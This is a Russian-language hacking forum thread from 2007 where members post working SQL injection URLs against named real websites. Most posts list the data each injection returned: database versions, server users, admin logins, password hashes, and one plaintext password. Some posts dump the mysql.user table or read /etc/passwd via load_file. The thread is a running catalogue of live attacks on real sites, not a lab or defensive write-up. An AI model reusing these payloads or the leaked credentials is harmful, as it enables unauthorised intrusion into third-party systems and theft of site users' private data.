ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3451  
Старый 28.10.2007, 00:56
Аватар для -MoLoToK-
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171

Репутация: 88
Отправить сообщение для -MoLoToK- с помощью ICQ
По умолчанию

Код:
http://www.psychasoc.com/print_news.php?ID=-1+union+select+version(),2,3,4,user()/*
4.0.27-log/psychasoc@192.168.3.5/psychasoc

Код:
http://www.vineargenti.com/eng/print_news.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9/*
user: oc/o@/giul - 5
version: ta/3-/4.1. - 5

Последний раз редактировалось -MoLoToK-; 28.10.2007 в 01:26..
 
Ответить с цитированием

  #3452  
Старый 28.10.2007, 16:45
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

ohranalist.ru

http://www.ohranalist.ru/index.php?page=news&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*

5.0.41-log/ohranalist/ohranalist@cub.mplik.ru


http://www.ohranalist.ru/index.php?page=news&id=-1+union+select+1,concat_ws(0x2F,login,password),3, 4+from+ohranalist_admin+limit+0,1/*

логин/хеш



http://www.ohranalist.ru/index.php?page=news&id=-1+union+select+1,concat_ws(0x3a,id,ip),3,4+from+ohranalist_hackers+limit+0,1/*

на момент написания поста таблица пуста ))



http://www.ohranalist.ru/index.php?page=news&id=-1+union+select+1,concat_ws(0x3a,email,md5rev),3,4+ from+ohranalist_users+limit+11,1/*

мейл/хеш еще есть поле name, но оно почему-то одинаковое для всех юзеров
 
Ответить с цитированием

  #3453  
Старый 28.10.2007, 17:06
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Код:
http://www.bedava-indir.net/detay.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8/*
4.1.18
Код:
http://www.miracyayinlari.com/mirac/detay.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12/*
miracyay_acakir@localhost:4.1.22-standard-log:miracyay_siparis
Код:
http://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt(version(),0x71),0x71),8,9/*
4.1.11-Debian_4sarge7
Код:
http://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt(user,0x71),0x71),8,9+from+mysql.user/*
root debian-sys-maint
Код:
http://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt(password,0x71),0x71),8,9+from+mysql.user/*
67457e226a1a15bd *4AAE5200D5AA02DC447305889D972AF35603AF6C
Цитата:
htp://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (email,0x71),0x71),8,9+from+users/*
htp://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (name,0x71),0x71),8,9+from+users/*
htp://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (pass,0x71),0x71),8,9+from+users/*
 
Ответить с цитированием

  #3454  
Старый 28.10.2007, 21:40
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

yugcont.ru

http://www.yugcont.ru/news1.php?id=-41+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*

4.0.27-log/yugcont/yugcont@pm17.zenon.net



http://www.yugcont.ru/news1.php?id=-41+union+select+1,2,3,login ,5,6,7,8,9+from+admin/*

логин столбец с паролем не подобрал (

--------------------------------------------------------------------

sibagro.ru

http://www.sibagro.ru/index.php?id_mod=17&id_tmpl=1&id_sect=2&view=artic le&id_art=-1+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENC RYPT(version(),0x71),0x71),10,11,12,13,14,15,16,17 ,18,19/*

аналогично database() и user()
5.0.19-standard/sibagro/root@localhost


http://www.sibagro.ru/index.php?id_mod=17&id_tmpl=1&id_sect=2&view=artic le&id_art=-1+union+select+1,2,3,4,5,6,7,8,concat(username,0x3 a,password,0x3a,email),10,11,12,13,14,15,16,17,18, 19+from+usr+limit+0,1/*

имя/пароль/мейл не хеш.
root:Ag5rWn
 
Ответить с цитированием

  #3455  
Старый 29.10.2007, 01:01
Аватар для -MoLoToK-
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171

Репутация: 88
Отправить сообщение для -MoLoToK- с помощью ICQ
По умолчанию

Код:
http://speleogenesis.info/pubalert/show_details.php?PubID=-1+union+select+1,user(),version(),4,5,6,7,8,9,10,11/*
4.0.25-standard
speleo3_datauser@localhost
таблицы пока не подобрал
-------------------------------

Для скули
Код:
http://www.psychasoc.com/print_news.php?ID=-1+union+select+version(),2,3,4,user()/*
таблицы admin
news
phorum_users
users
столбцы login
password

Последний раз редактировалось -MoLoToK-; 29.10.2007 в 01:38..
 
Ответить с цитированием

  #3456  
Старый 29.10.2007, 13:17
Аватар для Tyc00n
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию

Для любителей Comedy Club

Код:
http://rucomedy.com/comments.php?showid=1&serie='
 
Ответить с цитированием

  #3457  
Старый 29.10.2007, 13:46
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.i-b-m.ru/news.php?act=news_by_id&news_id=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(), database(),user()),7/*

4.1.22/site_i-b-m_v2/ibm@localhost

--------------------------------------------------------------

http://articles.astrakhan.info/?show=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*

4.0.25/wwwastrakhanlggr/astrak01@hux.hc.ru

--------------------------------------------------------------

http://www.e-concrete.ru/?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24

а тут что-то непонятное... вроде скуля есть, но .. посмотрите кому интерстно что это за фигня
 
Ответить с цитированием

  #3458  
Старый 29.10.2007, 15:16
Аватар для Heavy Metal
Heavy Metal
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760

Репутация: 62
Отправить сообщение для Heavy Metal с помощью ICQ
По умолчанию

Код:
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,3,load_file(0x2f)
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,3,load_file(0x2f6574632F706173737764)
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,concat_ws(0x3a,user,password),3+from+mysql.user+limit+1,2
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,concat_ws(0x3a,id,login,pass,fUll_name),4+from+real.admins+limit+0,1
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password),4+from+lipskerov.phpbb_users+limit+1,1/*lipskerov.ru
http://domainsdb.net/217.16.18.212
 
Ответить с цитированием

  #3459  
Старый 29.10.2007, 15:57
Аватар для fRg
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

www.pp-pss.ru - Партия Социальной Справедливости
Код:
http://www.pp-pss.ru/main.php?ID=388072&ar2=50&ar3=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
4.0.27-log:naslDB:naslR@srv5.nasledie.ru
До таблиц так и не докапался (будем работать!)
www.tour-m.ru - Компания "MT event group" Санкт-Петербург специализируется на обслуживании корпоративных клиентов и частных лиц (очень видные клиенты!)
Код:
http://www.tour-m.ru/about/news.php?id=-1+union+select+1,2,3,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),5,6/*
4.1.10a-standard-log:tourmru_mt:tourmru_mt@localhost
Доступ к users походу закрыт...
 
Ответить с цитированием

  #3460  
Старый 29.10.2007, 16:21
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Странную инъекцию сегодня нашел...
http://www.superseeds.com/products.php?cat=27'+union+select+1,2/*
Что в таких случаях надо делать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ